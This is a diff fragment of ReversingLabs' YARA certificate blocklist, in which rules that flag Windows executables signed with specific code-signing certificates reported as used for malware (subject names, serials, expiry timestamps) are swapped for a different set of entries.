 		tags = "INFO, FILE"
@@ -19471,21 +44136,21 @@ rule REVERSINGLABS_Cert_Blocklist_66C758A22Bfbbce327616815616Ddd07 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TIM Konstrakshn, TOV" and pe.signatures [ i ] . serial == "66:c7:58:a2:2b:fb:bc:e3:27:61:68:15:61:6d:dd:07" and 1469404800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RZOH ApS" and pe.signatures [ i ] . serial == "39:90:36:2c:34:01:5c:e4:c2:3e:cc:33:77:fd:3c:06" and 1606780800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E61B0366D940896430Bcfe3E93Baac5B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_121Fca3Cfa4Bd011669F5Cc4E053Aa3F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "24eb38c1-48a5-5d9b-a42d-345c4fda6c36"
+		id = "ebc47e1e-e6fe-581c-86b3-22e2e67a0b81"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15058-L15076"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1b1fd0c2237446ab22c7359d1e89d822a4b9b6ad345447740154d7d52635c2ea"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8054-L8070"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1edd5be3f970202be15080cd7ef19c0cce7fcba73cb6120d7cb7d518e877cf85"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19495,21 +44160,21 @@ rule REVERSINGLABS_Cert_Blocklist_E61B0366D940896430Bcfe3E93Baac5B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRANS LTD" and ( pe.signatures [ i ] . serial == "00:e6:1b:03:66:d9:40:89:64:30:bc:fe:3e:93:ba:ac:5b" or pe.signatures [ i ] . serial == "e6:1b:03:66:d9:40:89:64:30:bc:fe:3e:93:ba:ac:5b" ) and 1528156800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kymijoen Projektipalvelut Oy" and pe.signatures [ i ] . serial == "12:1f:ca:3c:fa:4b:d0:11:66:9f:5c:c4:e0:53:aa:3f" and 1606953600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6294B8Acc35Dea7D32A95Ac5D4536F8F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D338F8A490E37E6C2Be80A0E349929Fa : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bc380123-20fc-55de-ad1c-4f13ac173cc9"
+		id = "93ca450e-7278-5c6c-aba8-e90728570e0c"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15078-L15094"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ac92ff8e533121071a620ca5280ae66629576f9c4af9831ddac5bb487e4348af"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8072-L8090"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "39d9695803e96508b5ad12a7d9f8b65d13288dbe94b21a4952e096dd576e11ce"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19519,21 +44184,21 @@ rule REVERSINGLABS_Cert_Blocklist_6294B8Acc35Dea7D32A95Ac5D4536F8F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x87\\x8D\\xE5\\xBA\\x86\\xE6\\x8E\\xA2\\xE9\\x95\\xBF\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "62:94:b8:ac:c3:5d:ea:7d:32:a9:5a:c5:d4:53:6f:8f" and 1517443200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAGUARO ApS" and ( pe.signatures [ i ] . serial == "00:d3:38:f8:a4:90:e3:7e:6c:2b:e8:0a:0e:34:99:29:fa" or pe.signatures [ i ] . serial == "d3:38:f8:a4:90:e3:7e:6c:2b:e8:0a:0e:34:99:29:fa" ) and 1607558400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_485E4626C32493C16283Cfd9E30D17Ad : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2C1Ee9B583310B5E34A1Ee6945A34B26 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7e6834e5-ce32-5ba6-82cf-99d7b90fb4f0"
+		id = "70fc063e-f032-5e63-ae53-65a25d5a29c3"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15096-L15112"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "faf860786e8473493d24abf6e61cf0b906e98d786516be6d2098181368214020"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8092-L8108"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7752e49e8848863d78c5de03c3d194498765d80da00a84c5164c7a9010d13474"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19543,21 +44208,21 @@ rule REVERSINGLABS_Cert_Blocklist_485E4626C32493C16283Cfd9E30D17Ad : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "48:5e:46:26:c3:24:93:c1:62:83:cf:d9:e3:0d:17:ad" and 1473292800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Artmarket" and pe.signatures [ i ] . serial == "2c:1e:e9:b5:83:31:0b:5e:34:a1:ee:69:45:a3:4b:26" and 1607558400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D0312F9177Cd46B943Df3Ef22Db4608B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D875B3E3F2Db6C3Eb426E24946066111 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b36ba3c9-4a64-505a-ae27-ec8ee969dc29"
+		id = "4aedeb77-181b-5422-bec4-93c84412bae4"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15114-L15132"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2eb955e91c927980cee031c6284e48bad315e891c32cdaf41b844090e841c44d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8110-L8128"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9e181271d46c828b9ec266331e077b3b4891a193c71173447da383fad91ae878"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19567,21 +44232,21 @@ rule REVERSINGLABS_Cert_Blocklist_D0312F9177Cd46B943Df3Ef22Db4608B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "United Systems Technology, Inc." and ( pe.signatures [ i ] . serial == "00:d0:31:2f:91:77:cd:46:b9:43:df:3e:f2:2d:b4:60:8b" or pe.signatures [ i ] . serial == "d0:31:2f:91:77:cd:46:b9:43:df:3e:f2:2d:b4:60:8b" ) and 1341273600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kubit LLC" and ( pe.signatures [ i ] . serial == "00:d8:75:b3:e3:f2:db:6c:3e:b4:26:e2:49:46:06:61:11" or pe.signatures [ i ] . serial == "d8:75:b3:e3:f2:db:6c:3e:b4:26:e2:49:46:06:61:11" ) and 1606953600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_202702 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ad0A958Cdf188Bed43154A54Bf23Afba : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "befb8867-37d6-5b0a-9801-c069b92f8edc"
+		id = "183d9d02-885b-5f2f-b455-dd72af7bc5a6"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15134-L15150"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "bc097e97c1c4c4a71cbf66be811636fecfa23682cb2cc47ab1fcd680a646fb14"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8130-L8148"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "07e53e59f90aa3cd3a98dbca2627672606f6c6f8f3bda8456e32122463729c4b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19591,21 +44256,21 @@ rule REVERSINGLABS_Cert_Blocklist_202702 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RDCTO Ltd" and pe.signatures [ i ] . serial == "20:27:02" and 1087391361 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RHM Ltd" and ( pe.signatures [ i ] . serial == "00:ad:0a:95:8c:df:18:8b:ed:43:15:4a:54:bf:23:af:ba" or pe.signatures [ i ] . serial == "ad:0a:95:8c:df:18:8b:ed:43:15:4a:54:bf:23:af:ba" ) and 1612915200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_369A02E5D90B2649040E7F87 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3Cee26C125B8C188F316C3Fa78D9C2F1 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2b81466f-3eb1-5c12-8878-9257dde968fb"
+		id = "79989b9b-60e4-577d-97e2-cb447c38baf3"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15152-L15168"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e2a2e231914f166410580a42ca9d4aac18c5cba94d1f11d22e7acd6d375851d8"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8150-L8166"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5c64f8e40c31822ce8d2e34f96ccc977085e429f0c068a5f6b44099117837de1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19615,21 +44280,21 @@ rule REVERSINGLABS_Cert_Blocklist_369A02E5D90B2649040E7F87 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "36:9a:02:e5:d9:0b:26:49:04:0e:7f:87" and 1479094204 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bitubit LLC" and pe.signatures [ i ] . serial == "3c:ee:26:c1:25:b8:c1:88:f3:16:c3:fa:78:d9:c2:f1" and 1606435200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_60497070Ff4A83Bc87Bdea24Da5B431D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4C687A0022C36F89E253F91D1F6954E2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "510ab702-103b-5863-ac9a-46a917879e72"
+		id = "c45a2125-dd7c-5ff1-89a8-35cbe1d924d7"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15170-L15186"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "30998e3f5299a37cdee83b1232249b84dbb3c154ef99237da5ce1b16f9db5da3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8168-L8184"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "287c0c7a25e33e0e7def6efa23dbd2efba7c4ac3aa8f5deb8568a60a95e08bbe"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19639,21 +44304,21 @@ rule REVERSINGLABS_Cert_Blocklist_60497070Ff4A83Bc87Bdea24Da5B431D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "60:49:70:70:ff:4a:83:bc:87:bd:ea:24:da:5b:43:1d" and 1477008000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HETCO ApS" and pe.signatures [ i ] . serial == "4c:68:7a:00:22:c3:6f:89:e2:53:f9:1d:1f:69:54:e2" and 1606780800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0A333E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ca646B4275406Df639Cf603756F63D77 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5eaac242-ca22-5c73-9027-308d351080bf"
+		id = "b176b7f8-e3d1-593c-91c3-03e781f6ef7b"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15188-L15204"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f76d21e0ae2cf9b28825c813fc509d533c10aba38f8f0c2884365047c1272c1f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8186-L8204"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a690e3f6a656835984e47d999271fe441a5fbf424208da8d5b3c9ddcef47b70e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19663,21 +44328,21 @@ rule REVERSINGLABS_Cert_Blocklist_0A333E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Coulomb Limited" and pe.signatures [ i ] . serial == "0a:33:3e" and 1052750648 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SHOECORP LIMITED" and ( pe.signatures [ i ] . serial == "00:ca:64:6b:42:75:40:6d:f6:39:cf:60:37:56:f6:3d:77" or pe.signatures [ i ] . serial == "ca:64:6b:42:75:40:6d:f6:39:cf:60:37:56:f6:3d:77" ) and 1605830400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1Cb6519B2528D006D1Da987153Dad2B3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Addbec454B5479Cabd940A72Df4500Af : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "774e28f7-46ba-533d-a73c-00d2536c7d2b"
+		id = "f2488d44-5a9a-5ab6-be6f-f3444f72444a"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15206-L15222"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "776402fc3a7de4843373bc1981f965fe9c2a9f1fe2374b142a96952fd05a591b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8206-L8224"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "799629791646c524d170b900339b87474aed73b7156a8c4dd20f7c13cbe97929"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19687,21 +44352,21 @@ rule REVERSINGLABS_Cert_Blocklist_1Cb6519B2528D006D1Da987153Dad2B3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "D and D Internet Services" and pe.signatures [ i ] . serial == "1c:b6:51:9b:25:28:d0:06:d1:da:98:71:53:da:d2:b3" and 1012780800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SHAT LIMITED" and ( pe.signatures [ i ] . serial == "00:ad:db:ec:45:4b:54:79:ca:bd:94:0a:72:df:45:00:af" or pe.signatures [ i ] . serial == "ad:db:ec:45:4b:54:79:ca:bd:94:0a:72:df:45:00:af" ) and 1612828800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_621E696C3A6371E77A678Cbf0Ee34Ab2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ac307E5257Bb814B818D3633B630326F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "606749dc-f4ef-526a-8583-486401866759"
+		id = "c33d798a-854c-5fab-afbe-e94d142befa7"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15224-L15240"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "67c9fd92681d6dd1172509113e167e74e07f1f86fd62456758b3e3930180b528"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8226-L8244"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "10819bd2194fface6db812f8c6770c306c183386d2d9ba97467a5b55fd997194"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19711,21 +44376,21 @@ rule REVERSINGLABS_Cert_Blocklist_621E696C3A6371E77A678Cbf0Ee34Ab2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "62:1e:69:6c:3a:63:71:e7:7a:67:8c:bf:0e:e3:4a:b2" and 1467072000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aqua Direct s.r.o." and ( pe.signatures [ i ] . serial == "00:ac:30:7e:52:57:bb:81:4b:81:8d:36:33:b6:30:32:6f" or pe.signatures [ i ] . serial == "ac:30:7e:52:57:bb:81:4b:81:8d:36:33:b6:30:32:6f" ) and 1606089600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_21B991 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0D83E7F47189Cdbfc7Fa3E5F58882329 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "333a0901-21e7-5b4a-8daa-6a04fc2c4e86"
+		id = "d6bda332-06fc-5b1a-99fb-fc9578dc5326"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15242-L15258"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "54ca9b19adfc9357a3fb74f0670ad929319c4d06a7de7ae400f8285a31052276"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8246-L8262"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b344f9fd6d8378b7d77a34b14c5f37eea253f3d13a8eb0777925f195fb3cf502"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19735,21 +44400,21 @@ rule REVERSINGLABS_Cert_Blocklist_21B991 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Web Nexus d.o.o." and pe.signatures [ i ] . serial == "21:b9:91" and 1125477041 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE WIZARD GIFT CORPORATION" and pe.signatures [ i ] . serial == "0d:83:e7:f4:71:89:cd:bf:c7:fa:3e:5f:58:88:23:29" and 1605830400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1Cc37De5Dbed097F98F56Dbc : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_58Aa64564A50E8B2D6E31D5Cd6250Fde : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8c362133-a30f-599d-88e0-a1448433178a"
+		id = "00e096f6-2955-5936-9a75-f537c2da3621"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15260-L15276"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a2d04275b9fe37308c8f1dca75f4cc3c4a8985930f901e1f46e3ddc2977eea32"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8264-L8280"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f6b50ebf707b67650fe832d81c6fe8d2411cd83432ef94432d181db0c29aa48b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19759,21 +44424,21 @@ rule REVERSINGLABS_Cert_Blocklist_1Cc37De5Dbed097F98F56Dbc : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "1c:c3:7d:e5:db:ed:09:7f:98:f5:6d:bc" and 1476693977 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foreground" and pe.signatures [ i ] . serial == "58:aa:64:56:4a:50:e8:b2:d6:e3:1d:5c:d6:25:0f:de" and 1609002028 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_50F66Ab0D7Ed19B69D48F635E69572Fa : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2Aa0Ae245B487C8926C88Ee6D736D1Ca : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9938b4c5-4a2b-5f4a-92a0-28c3519b1ed3"
+		id = "d2d61fd7-2392-5d75-9c5b-4e4fddfc7a83"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L15278-L15294"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "28f71c0572e769d4a0cb289071912bc79cddfd98a3a8161c5400c7bee7090bf5"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L8282-L8298"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5a362175600552983ae838ca18aa378dc748b8b68bd8b67a9387794d983ed1a2"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19783,21 +44448,21 @@ rule REVERSINGLABS_Cert_Blocklist_50F66Ab0D7Ed19B69D48F635E69572Fa : INFO FILE
 		importance = 25
 
